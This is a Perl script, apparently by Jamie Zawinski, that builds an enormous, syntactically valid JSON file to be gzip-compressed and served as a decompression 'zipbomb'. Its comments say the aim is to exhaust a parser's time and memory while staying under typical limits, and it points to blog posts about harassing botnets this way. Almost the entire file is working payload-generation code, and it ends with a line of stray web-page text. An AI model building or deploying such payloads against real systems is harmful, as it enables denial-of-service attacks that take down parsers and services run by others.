#!/usr/bin/perl -w
# Copyright © 2026 Jamie Zawinski <jwz@jwz.org>
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation.  No representations are made about the suitability of this
# software for any purpose.  It is provided “as is” without express or
# implied warranty.
#
# Creates an absolutely enormous, but syntactically correct, JSON file,
# suitable for use as a zipbomb.
#
# It attempts to stay below various length and depth limitations, with my
# best guesses as to what typical parsers’ limits are; the goal here being
# to consume as much of the parser’s time and memory as possible before it
# has an excuse to give up early.
#
# With a 10GB file, ‘jq’ parses the entire file and produces no error
# messages, but also no output, and takes nearly 60 seconds to do so
# (Mac Studio M1 Ultra, 2026).
#
# "jsonbomb.pl --max-size 10GB | gzip --best" yields a 705MB file.
# With --no-permute-strings, it is a more reasonable 61MB.
#
# See https://www.jwz.org/blog/2026/01/zipbomb-json/
# and https://www.jwz.org/blog/2024/02/harassing-botnets-with-zipbombs/
#
# Created:  1-Feb-2026.

require 5;
use diagnostics;
use strict;
no warnings "recursion";    # json_emit_thing() calls itself for each nesting level.

# error() and usage() are defined near the end of the file but are called
# (with parentheses) from subs above them.  Declaring the prototypes here
# lets the parser check those calls instead of warning "called too early
# to check prototype" under -w.
sub error($);
sub usage(;$);

my $progname = $0; $progname =~ s@.*/@@g;     # basename of this script
my ($version) = ('$Revision: 1.05 $' =~ m/\s(\d[.\d]+)\s/s);

my $verbose = 1;                    # 0 suppresses the progress messages.

my $permute_strings_p     = 1;      # Scramble the generated strings?
my $max_string_length     = 1024;   # Length budget for string values.

my $max_object_keys       = 1024;
my $max_object_depth      = 1024;
my $max_object_key_length = 250;    # Length budget for object keys.

my $max_array_length      = 1024;
my $max_array_depth       = 1024;

my $max_output_bytes      = 1024 * 1024;    # Generation stops past this size.

# The text that every generated string and key is built from.
my $base_text = 'All work and no play makes Jack a dull boy.';

# Converts a human-readable size such as "512", "64K", "1.5MB" or "10 gb"
# into a plain number.  K, M and G are powers of 1024; the trailing "B" and
# the letter case are optional.
#
#   $arg  The command-line option being parsed; used only in error messages.
#   $s    The option's value, or undef if the command line ran out.
#
# Returns the size as a number.  A missing or unrecognizable value is
# reported through usage(), which exits, rather than handing undef back to
# the caller to be used as a limit.
#
sub parse_bytes($$) {
  my ($arg, $s) = @_;
  usage ("unparsable size: $arg") unless defined($s);

  my %scale = (''  => 1,
               'K' => 1024,
               'M' => 1024 * 1024,
               'G' => 1024 * 1024 * 1024);

  # One number with at most one decimal point, then an optional unit.
  if ($s =~ m@^(\d+(?:\.\d*)?)\s*(?:([KMG])B?)?$@si) {
    my $n    = $1;
    my $unit = uc (defined($2) ? $2 : '');
    return $n * $scale{$unit};
  }

  usage ("unparsable size: $arg $s");
  return undef;     # Not reached: usage() exits.
}

# Formats a byte count for humans: "0 bytes" for undef, otherwise whole
# GB, MB or KB, or the raw count followed by "bytes".
#
# The GB form is only used above 2 GB, so sizes between 1 and 2 GB are
# shown in MB.  The comparisons are strict, so exactly 1024 prints as
# "1024 bytes".
#
sub size_str($) {
  my ($size) = @_;
  if (!defined($size)) {
    return '0 bytes';
  } elsif ($size > 2*1024*1024*1024) {
    return sprintf("%.0f GB", $size / (1024*1024*1024));
  } elsif ($size > 1024*1024) {
    return sprintf("%.0f MB", $size / (1024*1024));
  } elsif ($size > 1024) {
    return sprintf("%d KB",   $size / 1024);
  } else {
    return "$size bytes";
  }
}

# Time (epoch seconds) of the most recent progress message, or undef if
# status() has not been called yet.  Setting it to 0 forces the next call
# to print.
my $last_status_time = undef;

# Prints a progress line to stderr saying how much of $max_output_bytes has
# been written, but only when more than 10 seconds have passed since the
# last message.  Does nothing when $verbose is 0.
#
#   $bytes  Number of bytes written so far.
#
sub status($) {
  my ($bytes) = @_;
  return unless $verbose;
  my $t = time();
  $last_status_time = $t unless defined($last_status_time);
  if ($t > $last_status_time + 10) {
    # A limit of 0 (e.g. "--max-size 0") must not divide by zero; any
    # output at all is already at or past such a limit.
    my $pct = ($max_output_bytes
               ? 100 * $bytes / $max_output_bytes
               : 100);
    print STDERR "$progname: " .
      sprintf("%s (%.0f%%) of %s\n",
              size_str($bytes), $pct, size_str($max_output_bytes));
    $last_status_time = $t;
  }
}

# Permute the strings in case the parser interns them for efficiency.
#
# Splits $line on whitespace and, word by word:
#   - about 20% of the time (for words of two or more characters), swaps
#     the last interior letter with a randomly chosen earlier interior
#     letter.  The first and last characters never move, and only that
#     one swap is made.
#   - about 10% of the time, upper-cases the whole word.
#
# Returns the words re-joined with single spaces, so the length of a
# single-spaced line is unchanged.
#
sub scrmable($) {
  my ($line) = @_;
  my @words;
  foreach my $word (split (/\s+/, $line)) {
    my @w = split (//, $word);
    my $A = shift (@w);
    my $Z = pop (@w);
    # $Z is undef for empty and one-character words: nothing to shuffle.
    if (defined($Z) && rand() > 0.8) {
      if (@w) {
        my $last = $#w;
        # 0 <= $j < $last; with a single interior letter this swaps it
        # with itself.
        my $j = int (rand() * $last);
        @w[$last, $j] = @w[$j, $last];
      }
      $word = $A . join ('', @w) . $Z;
    }
    $word = uc($word) if (rand() > 0.9);
    push @words, $word;
  }
  return join (' ', @words);
}

# Builds one JSON string literal, including its surrounding double quotes.
#
# The body is $base_text repeated, separated by single spaces, for as long
# as another copy still fits under $max_length.  If not even one copy fits,
# a substring of $base_text is used instead; when $permute_strings_p is set,
# its start and length are randomized.  With $permute_strings_p set the
# result is also passed through scrmable().
#
#   $max_length  Length budget for the text before escaping.
#
# Returns the quoted, escaped literal.
#
sub make_string($) {
  my ($max_length) = @_;
  my $L = length($base_text);
  my $L2 = 0;
  my @s = ();
  while ($L2 + $L < $max_length) {
    push @s, $base_text;
    $L2 += $L + 1;              # +1 for the joining space.
  }

  if (!@s) {
    # $base_text alone is too long: take a slice of it.  When permuting,
    # start up to 30% of the way in and trim up to 30% off the end.
    my $start = ($permute_strings_p
                 ? int ($L * rand() * 0.3)
                 : 0);
    my $L3 = $L - $start;
    $L3 = $max_length if ($L3 > $max_length);
    $L3 = ($permute_strings_p
           ? int ($L3 * (1 - rand() * 0.3))
           : $L3);
    push @s, substr ($base_text, $start, $L3);
  }

  my $s = join(' ', @s);
  $s = scrmable ($s) if ($permute_strings_p);

  # Escaping happens after the length has been settled, so the result can
  # exceed $max_length if $base_text has special characters; truncating
  # afterward could split an escape sequence and cause a syntax error.
  #
  # JSON only requires backslash, double quote and the control characters
  # U+0000 - U+001F to be escaped.  An apostrophe must NOT be escaped:
  # "\'" is not a legal JSON escape.
  my %esc = ("\\" => "\\\\", "\"" => "\\\"",
             "\n" => "\\n",  "\r" => "\\r", "\t" => "\\t",
             "\b" => "\\b",  "\f" => "\\f");
  $s =~ s/([\\"\x00-\x1F])/$esc{$1} || sprintf("\\u%04x", ord($1))/gse;

  return '"' . $s . '"';
}

# I'd kind of like to unroll this to use heap instead of stack,
# but it's sure a lot easier to think about it recursively.

# Writes one JSON value to stdout, recursing for nested containers.
#
#   $type         'string', 'array' or 'object'; anything else is fatal.
#   $depth        Nesting depth of this value (0 for children of the
#                 top-level array).
#   $total_bytes  Bytes already written before this value.  Used only to
#                 decide when $max_output_bytes has been passed and for
#                 progress reporting.
#
# Returns the number of bytes this call (including its children) wrote.
#
# Containers stop adding members as soon as the running total passes
# $max_output_bytes, but always close their bracket, so the output stays
# well-formed at every level.
#
sub json_emit_thing($$$);
sub json_emit_thing($$$) {
  my ($type, $depth, $total_bytes) = @_;

  my $this_bytes = 0;
  if ($type eq 'string') {

    my $s = make_string ($max_string_length);
    print STDOUT $s;
    $this_bytes += length($s);

  } elsif ($type eq 'array') {
    # Vary the element count: somewhere from 80% up to the maximum.
    my $n = int ($max_array_length * (1 - (rand() * 0.2)));

    # At the depth limit only strings are emitted; above it, roughly one
    # element in five is a nested object.
    my @types = ($depth >= $max_array_depth
                 ? ('string')
                 : ('string', 'string', 'string', 'string', 'object'));
    print STDOUT '[';
    $this_bytes++;
    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT ",\n";
        $this_bytes += 2;
      }
      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }
    print STDOUT ']';
    $this_bytes++;

  } elsif ($type eq 'object') {
    # Objects are sized by their own limit, so that --max-object-keys
    # takes effect independently of --max-array-length.
    my $n = int ($max_object_keys * (1 - (rand() * 0.2)));

    my @types = ($depth >= $max_object_depth
                 ? ('string')
                 : ('string', 'string', 'string', 'string', 'object'));
    print STDOUT '{';
    $this_bytes++;

    # Technically duplicate keys are allowed (last one wins) but some
    # parsers consider it an error.
    my %dups;

    for (my $i = 0; $i < $n; $i++) {
      if ($i > 0) {
        print STDOUT ",\n";
        $this_bytes += 2;
      }

      my $s = make_string ($max_object_key_length);
      $s =~ s/\s/_/gs;

      # A key seen before in this object gets the member index, in hex,
      # appended just inside its closing quote to make it unique.
      if ($dups{$s}) {
        my $ii = sprintf("%X", $i);
        $s =~ s/"$/_$ii"/s;
      }
      $dups{$s} = 1;

      print STDOUT $s;
      $this_bytes += length($s);
      print STDOUT ":";
      $this_bytes++;

      my $type2 = $types[int(rand() * @types)];
      $this_bytes += json_emit_thing ($type2, $depth + 1,
                                      $total_bytes + $this_bytes);
      last if ($total_bytes + $this_bytes > $max_output_bytes);
    }
    print STDOUT '}';
    $this_bytes++;

  } else {
    error ("unknown type: $type");
  }

  status ($total_bytes + $this_bytes);
  return $this_bytes;
}

# Writes the whole document to stdout: one top-level array whose elements
# are randomly chosen strings, arrays and objects, added until at least
# $max_output_bytes have been written.  Finishes with a final progress
# line on stderr (when $verbose is set).
#
sub jsonbomb() {

  # Top level object is always an array.

  print STDOUT '[';
  my $bytes = 1;

  # Two in six top-level elements are containers; the rest are strings.
  my @types = ('array', 'object', 'string', 'string', 'string', 'string');

  my $i = 0;
  while ($bytes < $max_output_bytes) {
    if ($i > 0) {
      print STDOUT ",\n";
      $bytes += 2;
    }

    my $type = $types[int(rand() * @types)];
    $bytes += json_emit_thing ($type, 0, $bytes);
    $i++;

    if ($i > $max_array_length) {
      # We've hit the max length of the top-level array object.
      # Increase the limits and keep going, because why not.
      print STDERR "$progname: hit max length; increasing limits.\n"
        if ($verbose);
      $max_array_length *= 2;
      $max_object_keys  *= 2;   # So that objects keep pace with arrays.
      $max_object_depth *= 2;
      $max_array_depth  *= 2;
    }
  }

  print STDOUT "]\n";

  # Zeroing the timestamp defeats status()'s rate limit, so the final
  # total is always reported.
  $last_status_time = 0;
  status ($bytes);
}

# Prints "$progname: $err" to stderr and exits with status 1.
#
sub error($) {
  my ($err) = @_;
  print STDERR "$progname: $err\n";
  exit 1;
}

# Prints the usage summary to stderr and exits with status 1.  The current
# values of the limits are shown as each option's example argument.
#
#   $a  Optional: the offending option or message, printed first as
#       "unknown option: ...".
#
sub usage(;$) {
  # Read the argument from @_ rather than from the global $_, which only
  # happens to hold something relevant at some call sites.
  my ($a) = @_;
  print STDERR "$progname: unknown option: $a\n" if defined($a);
  print STDERR "usage: $progname [--verbose] [--quiet]" .
   " [--max-size " . sprintf("%dK", $max_output_bytes/1024) . "]" .
   " [--permute-strings | --no-permute-strings]" .
   " [--max-object-keys $max_object_keys]" .
   " [--max-object-depth $max_object_depth]" .
   " [--max-object-key-length $max_object_key_length]" .
   " [--max-array-length $max_array_length]" .
   " [--max-array-depth $max_array_depth]" .
   " [--max-string-length $max_string_length]" .
   " [--base-text STRING]" .
   " > OUTFILE.json\n";
  exit 1;
}

# Parses @ARGV into the file-level settings, then generates the document.
# Long options are accepted with one or two leading dashes.  Anything
# unrecognized goes to usage(), which exits.
#
sub main() {
  while (@ARGV) {
    $_ = shift @ARGV;
    if (m/^--?verbose$/s) { $verbose++; }
    elsif (m/^-v+$/s) { $verbose += length($_)-1; }   # -vvv adds 3
    elsif (m/^--?quiet$/s) { $verbose = 0; }
    elsif (m/^--?max-size$/s) {
      $max_output_bytes  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-object-keys$/s) {
      $max_object_keys   = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-object-depth$/s) {
      $max_object_depth  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-object-key-length$/s) {
      $max_object_key_length = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-array-length$/s) {
      $max_array_length  = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-array-depth$/s) {
      $max_array_depth   = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?max-string-length$/s) {
      $max_string_length = parse_bytes ($_, shift @ARGV); }
    elsif (m/^--?base-text$/s) {
      # Without this check a trailing "--base-text" would leave the text
      # undefined and fail later, far from the cause.
      usage ($_) unless @ARGV;
      $base_text = shift @ARGV;
    }
    elsif (m/^--?permute(-strings?)?$/s) { $permute_strings_p = 1; }
    elsif (m/^--?no-permute(-strings?)?$/s) { $permute_strings_p = 0; }

    # Unknown options and stray non-option arguments are both errors.
    else { usage ($_); }
  }

  jsonbomb();
}

main();
exit 0;

# Leave a Reply   (stray text from the web page; not part of the script)